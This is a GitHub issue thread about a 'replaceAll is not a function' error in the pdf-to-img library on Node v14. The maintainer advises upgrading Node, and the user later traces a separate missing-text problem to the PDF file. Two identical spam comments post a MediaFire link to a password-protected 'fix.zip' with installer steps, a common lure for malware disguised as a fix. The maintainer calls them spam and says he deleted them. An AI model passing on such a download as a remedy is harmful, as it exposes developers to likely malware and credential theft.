### ISSUE TITLE
TypeError: object[key].replaceAll is not a function

### ISSUE THREAD

**Issue by ngekoding** [k-yle/pdf-to-img#240]
Just a simple code and getting an error.

```js
import { pdf } from 'pdf-to-img'

async function main() {
  const document = await pdf('/path/to/file.pdf')
}

main()
```

The errors:

```sh
TypeError: object[key].replaceAll is not a function
    at sanitize (/Users/nur/Devs/test/node_modules/pdf-to-img/dist/index.js:54:39)
    at /Users/nur/Devs/test/node_modules/pdf-to-img/dist/index.js:90:23
    at Generator.next (<anonymous>)
    at fulfilled (/Users/nur/Devs/test/node_modules/pdf-to-img/dist/index.js:28:58)
```

**Node and library version:**
- **Node:** v14.19.1
- **pdf-to-img:** v3.0.0

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by k-yle** [comment]
Hey @ngekoding, I've reported and deleted the spam. You're getting that error because you're using nodejs v14, which is very old and is no longer receicing security updates, so I strongly suggest you update to nodejs v20 or newer. Let me know if you still have issues using nodejs v20

**Comment by ngekoding** [comment]
So, currently, there is no solution without upgrading the Node version?

The main reason I'm trying to use this library is to refactor my code, which is currently written on the client side (VueJS) using `pdfjs-dist`, to run on the server side (NodeJS).

When using `pdfjs-dist` on the client side, everything works fine, but on NodeJS, the image results lose some text.

This issue was reported in the pdfjs repository, but there hasn't been a solution yet.

So, can we fix this issue using this library? As we know, this library also uses pdfjs.

**Comment by k-yle** [comment]
No, it's not possible to support node 14, it's been deprecated for over a year and none of our dependencies support node 14.

Why can't you upgrade to a newer version of nodejs which is still receiving security updates?

**Comment by ngekoding** [comment]
I will try to use updated Node version and see if the main issue can be resolved.

**Comment by ngekoding** [comment]
Sorry, it turns out the source of the problem was the PDF document I was using. After trying with Node v20, I still encountered issues with missing text, but when I tried using a different PDF document, everything worked fine, even with Node v14.
